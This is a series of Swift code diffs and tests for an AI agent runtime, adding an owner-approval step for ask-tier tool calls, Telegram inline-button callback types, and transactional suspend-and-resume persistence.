+/// Bot API `CallbackQuery` — an inline-button tap. `from` is never absent (a callback always has a
+/// sender), unlike `TMessage.from`; `message` is present when the button rode a message we can
+/// still edit; `data` carries the ≤64-byte `callback_data` we set on the button.
+struct TCallbackQuery: Decodable {
+  let id: String
+  let from: TUser
+  let message: TMessage?
+  let data: String?
+}
+
+/// The inline-keyboard wire shape Telegram expects inside `reply_markup`:
+/// `{"inline_keyboard":[[{"text":…,"callback_data":…}]]}`. This is the authoritative shape the
+/// approval keyboard's JSON string (Task 13) must reproduce; the client sends the string parsed to
+/// a `JSONValue`, so these Encodable types are the contract, not the send path.
+struct TInlineKeyboardButton: Encodable {
+  let text: String
+  let callback_data: String
+}
+struct TInlineKeyboardMarkup: Encodable {
+  let inline_keyboard: [[TInlineKeyboardButton]]
+}
+
 struct TUpdate: Decodable {
   let update_id: Int64
   let message: TMessage?
   let edited_message: TMessage?
+  let callback_query: TCallbackQuery?
 
+  // The button tap is decoded here so the client + tests have the wire surface; it is mapped into
+  // the wire-agnostic RawUpdate once that type gains its callback field (the intake half lands
+  // with the router's callback branch).
   func toRawUpdate() -> RawUpdate {
     RawUpdate(
       updateId: update_id,

--- a/Sources/ClawTools/Policy/ToolPolicyGate.swift
+++ b/Sources/ClawTools/Policy/ToolPolicyGate.swift
@@ -45,13 +45,13 @@ public struct ToolPolicyGate: Sendable {
       )
     }
 
-    // (2) unconditional tier — BLOCKING per FR-T6, every egress class
+    // (3) unconditional tier — BLOCKING per FR-T6, every egress class
     let unconditional = argGuard.evaluateUnconditional(argsJSON: call.argumentsJSON)
     if let rule = unconditional.blockedRule {
       return blockedArgs(rule: rule, argsRedacted: unconditional.redactedArgs)
     }
 
-    // (3) trifecta condition: tainted(session ∪ run) && privateData(assembly ∪ run)  [rev.1 H1]
+    // (4) trifecta condition: tainted(session ∪ run) && privateData(assembly ∪ run)  [rev.1 H1]
     let tainted = context.sessionTainted || context.runIngestedUntrusted
     let privateData = context.assemblyPrivateData || context.runPrivateData
     guard tainted && privateData else {
@@ -71,7 +71,7 @@ public struct ToolPolicyGate: Sendable {
       }
     }
 
-    // (3a) conditional tier — redaction-block WINS over approval (FR-T6); disk at gate time
+    // (4a) conditional tier — redaction-block WINS over approval (FR-T6); disk at gate time
     let conditional = argGuard.evaluateConditional(
       argsJSON: call.argumentsJSON,
       privateFileTexts: privateFileLoader()
@@ -80,7 +80,7 @@ public struct ToolPolicyGate: Sendable {
       return blockedArgs(rule: rule, argsRedacted: conditional.redactedArgs)
     }
 
-    // (3b) the arbitrary-destination egress class (§18-H): grant match or approval
+    // (5) the arbitrary-destination egress class (§18-H): grant match or approval
     let action: ToolAction?
     switch resolveAction(call: call, tool: tool) {
     case .action(let resolved):

--- a/Sources/ClawTools/Policy/ToolPolicyGate.swift
+++ b/Sources/ClawTools/Policy/ToolPolicyGate.swift
@@ -11,6 +11,9 @@ public struct ToolPolicyGate: Sendable {
     /// authorized; `nil` for the other classes.
     case allow(argsRedacted: String, consumedGrant: Bool, action: ToolAction?)
     case block(payload: ToolPayload, argsRedacted: String, pendingApproval: ToolApprovalRequest?)
+    /// An ask-tier action (§4.3/§5.1) parked for the owner's durable approval. Carries the recorded
+    /// canonical args the §5.3 suspend commit persists and the §6.3 resume replays.
+    case requireApproval(recorded: RecordedToolAction)
   }
 
   private let argGuard: ExfilArgGuard
@@ -26,6 +29,14 @@ public struct ToolPolicyGate: Sendable {
     tool: any Tool,
     context: ToolDispatchContext
   ) -> Verdict {
+    // (1) ask-tier is evaluated FIRST, before the egress fast-path (§4.3/§5.1): an ask-tier tool
+    // reaches the durable approval arm regardless of egress class — an ask-tier file_write has
+    // egress `.none` yet must still park for the owner's decision.
+    if tool.definition.riskLevel == .ask {
+      return evaluateAskTier(call: call, tool: tool, context: context)
+    }
+
+    // (2) .none-egress fast path — a safe non-egress read (file_read): audit-render only.
     guard tool.definition.egressClass != .none else {
       return .allow(
         argsRedacted: argGuard.renderRedacted(argsJSON: call.argumentsJSON),
@@ -181,6 +192,108 @@ public struct ToolPolicyGate: Sendable {
   }
 }
 
+// MARK: - Ask-tier approval
+
+private extension ToolPolicyGate {
+  /// §4.3/§5.1(a): an ask-tier tool MUST resolve a canonical target regardless of egress class —
+  /// the approval binds to the resolved form. Malformed args or a `.refused` resolution block as
+  /// they do for web_fetch; a `nil` resolution is a contract violation and fails CLOSED.
+  func evaluateAskTier(
+    call: ToolCall,
+    tool: any Tool,
+    context: ToolDispatchContext
+  ) -> Verdict {
+    guard let arguments = JSONValue.parse(call.argumentsJSON) else {
+      return askTierBlock(reason: "Malformed arguments for \(call.name).", call: call)
+    }
+
+    let target: String
+    switch tool.canonicalTarget(arguments: arguments) {
+    case .resolved(let resolved):
+      target = resolved
+    case .refused(let reason):
+      return askTierBlock(reason: reason, call: call)
+    case nil:
+      return askTierBlock(
+        reason: "\(call.name) is ask-tier but resolved no canonical target.",
+        call: call
+      )
+    }
+
+    // The run holds one approval slot (§5.2): a further ask-tier call while one is pending gets the
+    // blocked observation, never a second park.
+    guard context.approvalAlreadyPending == false else {
+      return .block(
+        payload: ToolPayload(
+          content: "blocked: an approval is already pending",
+          status: .blockedPendingApproval,
+          ingestedUntrusted: false
+        ),
+        argsRedacted: argGuard.renderRedacted(argsJSON: call.argumentsJSON),
+        pendingApproval: nil
+      )
+    }
+
+    let recorded = recordedAction(call: call, tool: tool, target: target, reason: .askTier)
+    return .requireApproval(recorded: recorded)
+  }
+
+  /// Phase 4 Task 23 (assumption A1) reuses this to record the trifecta action too. Canonicalizes
+  /// the call arguments to sorted-keys JSON, hashes via `ApprovalArgsHash`, and asks the tool for
+  /// its §5.4 presentation on the gate-resolved target.
+  func recordedAction(
+    call: ToolCall,
+    tool: any Tool,
+    target: String,
+    reason: ApprovalReason
+  ) -> RecordedToolAction {
+    let canonicalArgsJSON = Self.canonicalArgs(call.argumentsJSON)
+    let presentation: ToolApprovalPresentation
+    if let arguments = JSONValue.parse(call.argumentsJSON) {
+      presentation = tool.approvalPresentation(arguments: arguments, canonicalTarget: target)
+    } else {
+      presentation = ToolApprovalPresentation(
+        blastRadius: "egress to \(target)",
+        contentPreview: nil,
+        warnings: []
+      )
+    }
+    return RecordedToolAction(
+      tool: call.name,
+      canonicalArgsJSON: canonicalArgsJSON,
+      argsHash: ApprovalArgsHash.sha256Hex(canonicalArgsJSON),
+      canonicalTarget: target,
+      reason: reason,
+      presentation: presentation
+    )
+  }
+
+  func askTierBlock(reason: String, call: ToolCall) -> Verdict {
+    .block(
+      payload: ToolPayload(content: reason, status: .error, ingestedUntrusted: false),
+      argsRedacted: argGuard.renderRedacted(argsJSON: call.argumentsJSON),
+      pendingApproval: nil
+    )
+  }
+
+  /// Deterministic sorted-keys re-encoding so the same arguments always hash the same. Falls back
+  /// to the raw string only if it is unparseable (the ask-tier path already blocks that case).
+  static func canonicalArgs(_ rawArgumentsJSON: String) -> String {
+    guard let value = JSONValue.parse(rawArgumentsJSON) else {
+      return rawArgumentsJSON
+    }
+    let encoder = JSONEncoder()
+    encoder.outputFormatting = [.sortedKeys, .withoutEscapingSlashes]
+    guard
+      let data = try? encoder.encode(value),
+      let json = String(data: data, encoding: .utf8)
+    else {
+      return rawArgumentsJSON
+    }
+    return json
+  }
+}
+
 /// §9.1's full per-call order behind the loop's `ToolDispatching` seam: (0) lookup → (1) parse →
 /// (2)/(3) gate → (4) execute under the tool's own timeout. Audit is the LOOP's job (§6).
 public struct GatedToolDispatcher: ToolDispatching {
@@ -219,6 +332,21 @@ public struct GatedToolDispatcher: ToolDispatching {
         observation: ToolObservation(call: call, payload: payload),
         argsRedacted: argsRedacted,
         pendingApproval: pendingApproval
+      )
+    case .requireApproval(let recorded):
+      // The recorded action rides the outcome to the loop (Task 12), which sets the pending action
+      // and returns `.suspended`. The observation is the placeholder the §5.3 suspend commit
+      // persists in place and updates at resolution — the pending call itself does not execute now.
+      return ToolDispatchOutcome(
+        observation: ToolObservation(
+          callId: call.id,
+          toolName: call.name,
+          content: "awaiting owner approval",
+          status: .blockedPendingApproval,
+          ingestedUntrusted: false
+        ),
+        argsRedacted: gate.renderRedacted(argsJSON: call.argumentsJSON),
+        requiresApproval: recorded
       )
     case .allow(let argsRedacted, let consumedGrant, let action):
       // (4) execute under the tool's own timeout, on the gate-resolved canonical target

--- a/Sources/ClawTools/Policy/ToolPolicyGate.swift
+++ b/Sources/ClawTools/Policy/ToolPolicyGate.swift
@@ -249,6 +249,7 @@ private extension ToolPolicyGate {
   ) -> RecordedToolAction {
     let canonicalArgsJSON = Self.canonicalArgs(call.argumentsJSON)
     let presentation: ToolApprovalPresentation
+
     if let arguments = JSONValue.parse(call.argumentsJSON) {
       presentation = tool.approvalPresentation(arguments: arguments, canonicalTarget: target)
     } else {
@@ -258,6 +259,7 @@ private extension ToolPolicyGate {
         warnings: []
       )
     }
+
     return RecordedToolAction(
       tool: call.name,
       canonicalArgsJSON: canonicalArgsJSON,
@@ -282,14 +284,17 @@ private extension ToolPolicyGate {
     guard let value = JSONValue.parse(rawArgumentsJSON) else {
       return rawArgumentsJSON
     }
+
     let encoder = JSONEncoder()
     encoder.outputFormatting = [.sortedKeys, .withoutEscapingSlashes]
+
     guard
       let data = try? encoder.encode(value),
       let json = String(data: data, encoding: .utf8)
     else {
       return rawArgumentsJSON
     }
+
     return json
   }
 }

--- a/Sources/clawd/Subcommands/RunCommand.swift
+++ b/Sources/clawd/Subcommands/RunCommand.swift
@@ -173,6 +173,9 @@ private extension RunCommand {
     let breaker = BudgetBreaker(budget: config.budget)
     let lanes = SessionLaneRegistry()
     let pendingConfirmations = PendingConfirmationRegistry()
+    // Phase 2: the coordinator is constructed and threaded through the suspend path's parker; the
+    // Phase 3 callback handler + ApprovalWaiter (Tasks 15-19) will signal/consume it.
+    let approvalCoordinator = ApprovalCoordinator()
 
     // Hoisted so the schedule draft parser and the agent share one provider instance.
     let provider = OpenAICompatibleProvider(
@@ -235,6 +238,8 @@ private extension RunCommand {
       notifyOutbox: { outboxSignal.poke() },
       breaker: breaker,
       delivery: transport,
+      parker: InertApprovalParker(coordinator: approvalCoordinator, logger: logger),
+      approvalExpirySeconds: config.approvalExpirySeconds,
       logger: logger
     )
     let scheduleSurface = makeScheduleSurface(

--- a/Sources/clawd/Subcommands/RunCommand.swift
+++ b/Sources/clawd/Subcommands/RunCommand.swift
@@ -173,8 +173,6 @@ private extension RunCommand {
     let breaker = BudgetBreaker(budget: config.budget)
     let lanes = SessionLaneRegistry()
     let pendingConfirmations = PendingConfirmationRegistry()
-    // Phase 2: the coordinator is constructed and threaded through the suspend path's parker; the
-    // Phase 3 callback handler + ApprovalWaiter (Tasks 15-19) will signal/consume it.
     let approvalCoordinator = ApprovalCoordinator()
 
     // Hoisted so the schedule draft parser and the agent share one provider instance.

--- a/Tests/ClawAgentTests/Runtime/AgentSuspendTests.swift
+++ b/Tests/ClawAgentTests/Runtime/AgentSuspendTests.swift
@@ -1,0 +1,220 @@
+import ClawCore
+import Foundation
+import Testing
+
+@testable import ClawAgent
+
+/// §5.2 durable suspend semantics: the FIRST ask-tier proposal in a tool-call batch records its
+/// action and parks the run (`TurnResult.suspended`); earlier calls execute normally and further
+/// gated calls observe "an approval is already pending" instead of parking a second time. Also
+/// pins `TurnOutcome.hadPrivateData = assemblyPrivateData ∪ runPrivateData` (D6).
+@Suite struct AgentSuspendTests {
+  // MARK: - Fixtures
+
+  private func recorded(tool: String, target: String = "/ws/notes/plan.md") -> RecordedToolAction {
+    RecordedToolAction(
+      tool: tool,
+      canonicalArgsJSON: #"{"content":"hello","path":"notes/plan.md"}"#,
+      argsHash: "abc123",
+      canonicalTarget: target,
+      reason: .askTier,
+      presentation: ToolApprovalPresentation(
+        blastRadius: "create, 5 B",
+        contentPreview: "hello",
+        warnings: []
+      )
+    )
+  }
+
+  /// The gate returned `.requireApproval`: the tool has NOT executed. Its observation is a
+  /// placeholder the loop DISCARDS — the real placeholder row rides the suspend commit (§5.3).
+  private func requireApprovalOutcome(call: ToolCall, tool: String) -> ToolDispatchOutcome {
+    ToolDispatchOutcome(
+      observation: ToolObservation(
+        callId: call.id,
+        toolName: call.name,
+        content: "awaiting owner approval",
+        status: .ok,
+        ingestedUntrusted: false
+      ),
+      argsRedacted: call.argumentsJSON,
+      requiresApproval: recorded(tool: tool)
+    )
+  }
+
+  private func blockedOutcome(call: ToolCall) -> ToolDispatchOutcome {
+    ToolDispatchOutcome(
+      observation: ToolObservation(
+        callId: call.id,
+        toolName: call.name,
+        content: "blocked: an approval is already pending",
+        status: .blockedPendingApproval,
+        ingestedUntrusted: false
+      ),
+      argsRedacted: call.argumentsJSON
+    )
+  }
+
+  private func okOutcome(call: ToolCall, readPrivateData: Bool = false) -> ToolDispatchOutcome {
+    ToolDispatchOutcome(
+      observation: ToolObservation(
+        callId: call.id,
+        toolName: call.name,
+        content: "ok",
+        status: .ok,
+        ingestedUntrusted: false,
+        readPrivateData: readPrivateData
+      ),
+      argsRedacted: call.argumentsJSON
+    )
+  }
+
+  // MARK: - Mid-batch suspend
+
+  @Test func firstAskTierProposalSuspendsCarryingThePendingAction() async throws {
+    // given — one batch: a safe read that executes, then an ask-tier file_write that parks
+    let readCall = ToolCall(id: "r1", name: "file_read", argumentsJSON: #"{"path":"a.md"}"#)
+    let writeCall = ToolCall(
+      id: "w1",
+      name: "file_write",
+      argumentsJSON: #"{"path":"notes/plan.md","content":"hello"}"#
+    )
+    let dispatcher = ScriptedDispatcher { call, _ in
+      call.name == "file_read"
+        ? self.okOutcome(call: call)
+        : self.requireApprovalOutcome(call: call, tool: "file_write")
+    }
+    let provider = SequenceProvider([toolCallResponse([readCall, writeCall])])
+    let runtime = makeRuntime(provider: provider, toolDispatcher: dispatcher)
+
+    // when
+    let outcome = try await runtime.runTurn(
+      runId: 1,
+      sessionId: 1,
+      chatId: 7,
+      buildResult: makeBuildResult(),
+      sessionTainted: false,
+      grant: nil,
+      todayTokens: 0,
+      todayUSD: 0
+    )
+
+    // then — the run parked on the FIRST ask-tier proposal, carrying its recorded action
+    guard case .suspended(let pending, _) = outcome.result else {
+      Issue.record("expected .suspended, got \(outcome.result)")
+      return
+    }
+    #expect(pending.toolCallId == "w1")
+    #expect(pending.recorded.tool == "file_write")
+    #expect(pending.recorded.reason == .askTier)
+    #expect(pending.recorded.canonicalTarget == "/ws/notes/plan.md")
+
+    // and — the earlier safe call's observation persists; the parked call's does NOT (its
+    // placeholder row is reserved at the suspend commit, §5.3)
+    let exchange = try #require(outcome.exchanges.first)
+    #expect(exchange.toolCalls.map(\.id) == ["r1", "w1"])
+    #expect(exchange.observations.map(\.callId) == ["r1"])
+  }
+
+  @Test func furtherGatedCallInTheSameBatchIsBlockedNotASecondSuspension() async throws {
+    // given — two ask-tier proposals in one batch
+    let firstCall = ToolCall(
+      id: "w1",
+      name: "file_write",
+      argumentsJSON: #"{"path":"notes/plan.md","content":"hello"}"#
+    )
+    let secondCall = ToolCall(
+      id: "w2",
+      name: "memory_write",
+      argumentsJSON: #"{"text":"remember"}"#
+    )
+    let dispatcher = ScriptedDispatcher { call, context in
+      // The durable pending action feeds the gate's approvalAlreadyPending flag: the first call
+      // parks, every later call in the batch is blocked-observation only (§5.2).
+      context.approvalAlreadyPending
+        ? self.blockedOutcome(call: call)
+        : self.requireApprovalOutcome(call: call, tool: call.name)
+    }
+    let provider = SequenceProvider([toolCallResponse([firstCall, secondCall])])
+    let runtime = makeRuntime(provider: provider, toolDispatcher: dispatcher)
+
+    // when
+    let outcome = try await runtime.runTurn(
+      runId: 2,
+      sessionId: 2,
+      chatId: 7,
+      buildResult: makeBuildResult(),
+      sessionTainted: false,
+      grant: nil,
+      todayTokens: 0,
+      todayUSD: 0
+    )
+
+    // then — exactly ONE park (the first); the second is a blocked observation
+    guard case .suspended(let pending, _) = outcome.result else {
+      Issue.record("expected .suspended, got \(outcome.result)")
+      return
+    }
+    #expect(pending.toolCallId == "w1")
+    #expect(pending.recorded.tool == "file_write")
+
+    let exchange = try #require(outcome.exchanges.first)
+    #expect(exchange.observations.map(\.callId) == ["w2"])
+    #expect(exchange.observations.first?.status == .blockedPendingApproval)
+
+    // and — the second call's dispatch context saw the pending flag set by the first
+    let records = await dispatcher.records
+    #expect(records.map(\.context.approvalAlreadyPending) == [false, true])
+  }
+
+  // MARK: - hadPrivateData (D6)
+
+  @Test func hadPrivateDataReflectsTheAssemblyFlag() async throws {
+    // given — context assembled a USER/MEMORY section (assemblyPrivateData), no tools
+    let provider = StubProvider(.respond(okResponse(content: "done")))
+    let runtime = makeRuntime(provider: provider)
+
+    // when
+    let outcome = try await runtime.runTurn(
+      runId: 3,
+      sessionId: 3,
+      chatId: 7,
+      buildResult: makeBuildResult(hasPrivateDataAccess: true),
+      sessionTainted: false,
+      grant: nil,
+      todayTokens: 0,
+      todayUSD: 0
+    )
+
+    // then
+    #expect(outcome.hadPrivateData)
+  }
+
+  @Test func hadPrivateDataReflectsARunLocalPrivateRead() async throws {
+    // given — assembly touched no private data, but an executed tool read it THIS run
+    let readCall = ToolCall(id: "p1", name: "file_read", argumentsJSON: #"{"path":"MEMORY.md"}"#)
+    let dispatcher = ScriptedDispatcher { call, _ in
+      self.okOutcome(call: call, readPrivateData: true)
+    }
+    let provider = SequenceProvider([
+      toolCallResponse([readCall]),
+      okResponse(content: "done"),
+    ])
+    let runtime = makeRuntime(provider: provider, toolDispatcher: dispatcher)
+
+    // when
+    let outcome = try await runtime.runTurn(
+      runId: 4,
+      sessionId: 4,
+      chatId: 7,
+      buildResult: makeBuildResult(hasPrivateDataAccess: false),
+      sessionTainted: false,
+      grant: nil,
+      todayTokens: 0,
+      todayUSD: 0
+    )
+
+    // then — the union catches the run-local read even when assembly was clean
+    #expect(outcome.hadPrivateData)
+  }
+}

--- a/Tests/ClawDataTests/Stores/Delivery/OutboxStoreTests.swift
+++ b/Tests/ClawDataTests/Stores/Delivery/OutboxStoreTests.swift
@@ -1,5 +1,6 @@
 import ClawCore
 import Foundation
+import GRDB
 import Testing
 
 @testable import ClawData
@@ -8,6 +9,8 @@ import Testing
   private struct Fixture {
     let outbox: OutboxStoreGRDB
     let runs: RunStoreGRDB
+    let approvals: ApprovalStoreGRDB
+    let writer: DatabaseQueue
     let sessionId: Int64
     let runId: Int64
   }
@@ -32,8 +35,29 @@ import Testing
     return Fixture(
       outbox: OutboxStoreGRDB(writer: queue),
       runs: RunStoreGRDB(writer: queue),
+      approvals: ApprovalStoreGRDB(writer: queue),
+      writer: queue,
       sessionId: sessionId,
       runId: runId
+    )
+  }
+
+  private func sampleApproval(runId: Int64, sessionId: Int64) -> NewApproval {
+    NewApproval(
+      runId: runId,
+      sessionId: sessionId,
+      tool: "file_write",
+      canonicalArgsJSON: "{\"path\":\"notes.md\"}",
+      canonicalTarget: "/workspace/notes.md",
+      argsHash: "deadbeef",
+      policyVersion: "0123456789abcdef",
+      ownerUserId: 42,
+      nonce: ApprovalNonce.generate(),
+      observationMessageId: 1,
+      toolCallId: "call-1",
+      reason: .askTier,
+      createdTs: Date(),
+      expiresTs: Date().addingTimeInterval(3600)
     )
   }
 
@@ -125,5 +149,90 @@ import Testing
         payloadHash: "c"
       ) == false
     )
+  }
+
+  @Test func pendingOutboundCarriesApprovalIdAndReplyMarkup() throws {
+    // given — an approvals row and a PENDING delivery linked to it, carrying an inline keyboard
+    let env = try fixture()
+    let approvalId = try env.writer.write { db in
+      try ApprovalStoreGRDB.insertApproval(
+        db,
+        sampleApproval(runId: env.runId, sessionId: env.sessionId)
+      )
+    }
+    let markup = "{\"inline_keyboard\":[[{\"text\":\"Approve\",\"callback_data\":\"apr:x:y\"}]]}"
+
+    // when
+    _ = try env.outbox.claimOutbound(
+      runId: env.runId,
+      stepIndex: 0,
+      chatId: 42,
+      payload: "prompt",
+      payloadHash: "h",
+      approvalId: approvalId,
+      replyMarkup: markup
+    )
+    let rows = try env.outbox.pendingOutbound()
+
+    // then — both new fields round-trip through the SELECT
+    let row = try #require(rows.first)
+    #expect(row.approvalId == approvalId)
+    #expect(row.replyMarkup == markup)
+  }
+
+  @Test func markSentLinksPromptMessageIdForApprovalBearingRow() throws {
+    // given — an approvals row (prompt_message_id NULL) and its delivery row
+    let env = try fixture()
+    let approvalId = try env.writer.write { db in
+      try ApprovalStoreGRDB.insertApproval(
+        db,
+        sampleApproval(runId: env.runId, sessionId: env.sessionId)
+      )
+    }
+    _ = try env.outbox.claimOutbound(
+      runId: env.runId,
+      stepIndex: 0,
+      chatId: 42,
+      payload: "prompt",
+      payloadHash: "h",
+      approvalId: approvalId,
+      replyMarkup: "{\"inline_keyboard\":[]}"
+    )
+
+    // when — the dispatcher records the delivered Telegram message id
+    try env.outbox.markSent(runId: env.runId, stepIndex: 0, telegramMessageId: 999, now: Date())
+
+    // then — the linked approval got prompt_message_id in the same transaction
+    let approval = try #require(try env.approvals.approval(id: approvalId))
+    #expect(approval.promptMessageId == 999)
+  }
+
+  @Test func markSentLeavesUnlinkedApprovalsUntouched() throws {
+    // given — an approvals row NOT referenced by any delivery, and a plain (approval_id NULL) row
+    let env = try fixture()
+    let approvalId = try env.writer.write { db in
+      try ApprovalStoreGRDB.insertApproval(
+        db,
+        sampleApproval(runId: env.runId, sessionId: env.sessionId)
+      )
+    }
+    _ = try env.outbox.claimOutbound(
+      runId: env.runId,
+      stepIndex: 0,
+      chatId: 42,
+      payload: "plain",
+      payloadHash: "h"
+    )
+    // the plain row carries nil approval_id/reply_markup — assert BEFORE markSent flips it to SENT
+    // (a SENT row drops out of pendingOutbound, so this read must precede the mark).
+    let plainRow = try #require(try env.outbox.pendingOutbound().first { $0.approvalId == nil })
+    #expect(plainRow.replyMarkup == nil)
+
+    // when — marking the plain row sent must not touch any approval
+    try env.outbox.markSent(runId: env.runId, stepIndex: 0, telegramMessageId: 111, now: Date())
+
+    // then — the unrelated approval keeps its NULL prompt_message_id
+    let approval = try #require(try env.approvals.approval(id: approvalId))
+    #expect(approval.promptMessageId == nil)
   }
 }

--- a/Tests/ClawDataTests/Stores/Run/SuspendedTurnCommitTests.swift
+++ b/Tests/ClawDataTests/Stores/Run/SuspendedTurnCommitTests.swift
@@ -1,0 +1,195 @@
+import ClawCore
+import Foundation
+import GRDB
+import Testing
+
+@testable import ClawData
+
+@Suite struct SuspendedTurnCommitTests {
+  private struct Fixture {
+    let queue: DatabaseQueue
+    let sessionId: Int64
+    let runId: Int64
+  }
+
+  private func makeRunningFixture() throws -> Fixture {
+    let queue = try ClawDatabase.makeInMemoryQueue()
+    try ClawDatabase.migrate(queue)
+    let sessions = SessionMessageStoreGRDB(writer: queue)
+    let claim = try sessions.claimAndPersistInbound(
+      InboundMessage(
+        updateId: 1,
+        sessionKey: "tg:dm:7",
+        chatId: 7,
+        userId: 7,
+        text: "write the plan",
+        isEdited: false,
+        ts: Date()
+      )
+    )
+    let runs = RunStoreGRDB(writer: queue)
+    let runId = try #require(claim.runId)
+    _ = try #require(try runs.pickUp(runId: runId, now: Date()))
+    return Fixture(queue: queue, sessionId: try #require(claim.sessionId), runId: runId)
+  }
+
+  private func makeCommit(_ fixture: Fixture) -> SuspendedTurnCommit {
+    let recorded = RecordedToolAction(
+      tool: "file_write",
+      canonicalArgsJSON: #"{"content":"hi","path":"notes/plan.md"}"#,
+      argsHash: "hash16",
+      canonicalTarget: "/workspace/notes/plan.md",
+      reason: .askTier,
+      presentation: ToolApprovalPresentation(
+        blastRadius: "create, 2 B",
+        contentPreview: "hi",
+        warnings: []
+      )
+    )
+    let buttonChunk = OutboxChunk(
+      stepIndex: 0,
+      chatId: 7,
+      payload: "Approve writing /workspace/notes/plan.md?",
+      payloadHash: "hash",
+      approvalId: nil,
+      replyMarkup: #"{"inline_keyboard":[[{"text":"Approve","callback_data":"apr:n0:y"}]]}"#
+    )
+    return SuspendedTurnCommit(
+      assistantContent: "Let me save that.",
+      toolCallsJSON: #"[{"id":"w1","name":"file_write","arguments":"{}"}]"#,
+      completedObservations: [],
+      pending: PendingToolAction(toolCallId: "w1", recorded: recorded),
+      ownerUserId: 7,
+      nonce: "n0",
+      promptChunks: [buttonChunk],
+      setTainted: false,
+      setPrivateData: true,
+      expiresTs: Date().addingTimeInterval(3600)
+    )
+  }
+
+  private func count(_ queue: DatabaseQueue, _ sql: String) throws -> Int {
+    try queue.read { db in try Int.fetchOne(db, sql: sql) ?? 0 }
+  }
+
+  @Test func suspendCommitPersistsTheWholeCheckpointInOneTransaction() throws {
+    // given
+    let fixture = try makeRunningFixture()
+    let runs = RunStoreGRDB(writer: fixture.queue)
+
+    // when
+    let receipt = try runs.commitSuspendedTurn(
+      runId: fixture.runId,
+      sessionId: fixture.sessionId,
+      commit: makeCommit(fixture),
+      now: Date()
+    )
+
+    // then — run suspended, approval PENDING, placeholder pinned, audit + prompt landed
+    let runState = try fixture.queue.read { db in
+      try String.fetchOne(
+        db,
+        sql: "SELECT state FROM runs WHERE id = ?",
+        arguments: [fixture.runId]
+      )
+    }
+    #expect(runState == RunState.awaitingApproval.rawValue)
+
+    let approval = try fixture.queue.read { db in
+      try Row.fetchOne(
+        db,
+        sql: "SELECT * FROM approvals WHERE id = ?",
+        arguments: [receipt.approvalId]
+      )
+    }
+    #expect(approval?["state"] == ApprovalState.pending.rawValue)
+    #expect(approval?["tool"] == "file_write")
+    #expect(approval?["nonce"] == "n0")
+    #expect(approval?["reason"] == ApprovalReason.askTier.rawValue)
+    #expect((approval?["observation_message_id"] as Int64?) == receipt.observationMessageId)
+
+    let placeholder = try fixture.queue.read { db in
+      try String.fetchOne(
+        db,
+        sql: "SELECT content FROM messages WHERE id = ?",
+        arguments: [receipt.observationMessageId]
+      )
+    }
+    #expect(placeholder == "awaiting owner approval")
+
+    #expect(
+      try count(
+        fixture.queue,
+        "SELECT COUNT(*) FROM messages WHERE role = 'assistant' AND tool_calls IS NOT NULL"
+      ) == 1
+    )
+    #expect(
+      try count(
+        fixture.queue,
+        "SELECT COUNT(*) FROM audit_events WHERE action = 'approval_requested'"
+      ) == 1
+    )
+    #expect(
+      try count(
+        fixture.queue,
+        "SELECT COUNT(*) FROM outbound_deliveries WHERE approval_id = \(receipt.approvalId)"
+      ) == 1
+    )
+    // The suspend commit persists NO usage row — the suspending round was already debited mid-loop,
+    // so a second write here would double the budget and the §6.3 resume carry-over.
+    #expect(try count(fixture.queue, "SELECT COUNT(*) FROM provider_usage") == 0)
+    // §4.5: the private-data flag rides the suspend commit from day one (D6).
+    let hasPrivate = try fixture.queue.read { db in
+      try Bool.fetchOne(
+        db,
+        sql: "SELECT has_private_data FROM sessions WHERE id = ?",
+        arguments: [fixture.sessionId]
+      )
+    }
+    #expect(hasPrivate == true)
+  }
+
+  @Test func aWriteFaultRollsBackTheEntireCheckpoint() throws {
+    // given — the fault seam throws just before the commit returns (still inside the txn)
+    let fixture = try makeRunningFixture()
+    struct InjectedFault: Error {}
+    let runs = RunStoreGRDB(
+      writer: fixture.queue,
+      suspendCommitFault: { throw InjectedFault() }
+    )
+
+    // when / then — the whole checkpoint rolls back
+    #expect(throws: InjectedFault.self) {
+      _ = try runs.commitSuspendedTurn(
+        runId: fixture.runId,
+        sessionId: fixture.sessionId,
+        commit: makeCommit(fixture),
+        now: Date()
+      )
+    }
+
+    let runState = try fixture.queue.read { db in
+      try String.fetchOne(
+        db,
+        sql: "SELECT state FROM runs WHERE id = ?",
+        arguments: [fixture.runId]
+      )
+    }
+    #expect(runState == RunState.running.rawValue)
+    #expect(try count(fixture.queue, "SELECT COUNT(*) FROM approvals") == 0)
+    #expect(try count(fixture.queue, "SELECT COUNT(*) FROM messages WHERE role = 'tool'") == 0)
+    #expect(
+      try count(
+        fixture.queue,
+        "SELECT COUNT(*) FROM messages WHERE role = 'assistant' AND tool_calls IS NOT NULL"
+      ) == 0
+    )
+    #expect(
+      try count(
+        fixture.queue,
+        "SELECT COUNT(*) FROM audit_events WHERE action = 'approval_requested'"
+      ) == 0
+    )
+    #expect(try count(fixture.queue, "SELECT COUNT(*) FROM outbound_deliveries") == 0)
+  }
+}

--- a/Tests/ClawGatewayTests/Acceptance/SC3Harness.swift
+++ b/Tests/ClawGatewayTests/Acceptance/SC3Harness.swift
@@ -30,6 +30,7 @@ func resolvedAddress(_ literal: String) -> ResolvedAddress {
 /// policy, real tools — scripted only at the provider, HTTP, and DNS seams.
 struct SC3Harness {
   let router: MessageRouter
+  let coordinator: ApprovalCoordinator
   let registry: PendingConfirmationRegistry
   let transport: RecordingTransport
   let stores: ClawStores
@@ -118,6 +119,8 @@ func makeSC3Harness(
   workspaceFiles: [String: String] = [:],
   registry: PendingConfirmationRegistry = PendingConfirmationRegistry(),
   databasePath: String? = nil,
+  coordinator: ApprovalCoordinator = ApprovalCoordinator(),
+  extraTools: [any Tool] = [],
   dispatcherOverride: (any ToolDispatching)? = nil
 ) throws -> SC3Harness {
   let fileManager = FileManager.default
@@ -157,11 +160,12 @@ func makeSC3Harness(
   let http = ScriptedHTTP(responses: httpResponses)
   let resolver = ScriptedResolver(table: resolverTable)
   let redactor = SecretRedactor(secretValues: secretValues)
-  let tools: [any Tool] = [
-    FileReadTool(workspaceRoot: workspaceRoot, redactor: redactor),
-    WebFetchTool(http: http, resolver: resolver, redactor: redactor),
-    WebSearchTool(search: ExaSearchProvider(apiKey: "exa-key", http: http)),
-  ]
+  let tools: [any Tool] =
+    [
+      FileReadTool(workspaceRoot: workspaceRoot, redactor: redactor),
+      WebFetchTool(http: http, resolver: resolver, redactor: redactor),
+      WebSearchTool(search: ExaSearchProvider(apiKey: "exa-key", http: http)),
+    ] + extraTools
 
   // 5. GatedToolDispatcher: tier-3 private files load from DISK at gate-evaluation time (rev.1 H1).
